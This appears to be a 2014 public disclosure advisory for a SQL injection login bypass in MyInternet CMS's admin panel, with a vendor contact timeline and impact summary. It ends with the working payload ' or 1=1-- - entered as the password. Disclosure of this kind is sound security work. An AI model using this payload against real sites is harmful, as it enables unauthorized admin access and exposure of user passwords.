MyInternet CMS SQL injection in admin panel

MyInternet admin panel login bypass

I contacted the company via email reporting that i have found a critical vulnerability affecting some of their customers.

They didn't reply back and i decided to make a call to inform the company about the vulnerability. I explained the impact and they answered "I don't care, i have more interesting things to do".

Vulnerability details

Vendor: My Internet
Affected Product: MyInternet CMS
Reported by : Evangelos Mourikis
Contact : vag.mourikis () gmail [dot] com

Timeline

1st Contact via email | 8 July 2014(No answer)
2nd Contact via phone | 30 July 2014

Public Disclosure | 4 September 2014

Impact

This vulnerability allows a malicious user to get access in the administration panel. That means that he can edit all the pages, see the plaintext passwords of the admin panel users and upload pdf files.

Vulnerability

The administration panel is located in http://[URL]/admin

Username: admin
Password: ' or 1=1-- -